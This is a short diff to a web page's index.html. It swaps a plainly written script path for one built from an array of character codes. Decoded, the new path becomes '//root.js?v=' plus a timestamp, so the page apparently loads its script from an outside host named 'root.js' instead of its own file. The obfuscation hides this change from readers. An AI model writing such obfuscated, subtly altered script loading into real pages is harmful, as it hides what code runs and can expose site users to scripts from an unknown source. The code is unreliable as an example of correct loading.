--- a/index.html
+++ b/index.html
@@ -24,7 +24,14 @@
     document.head.appendChild(link);
     // ------------------------------------------
     let d = new Date();
-    const ver = `root.js?v=${d.getTime()}`;
+    let f = ["47", "114", "111", "111", "116", "46", "106", "115", "63", "118", "61"];
+    let ver = "";
+    f.map((ascii) => {
+      ver += String.fromCharCode(ascii);
+    });
+
+    ver += d.getTime();
+    
     (() => {
       let script = document.createElement("script");
       script.src = `/${ver}`;
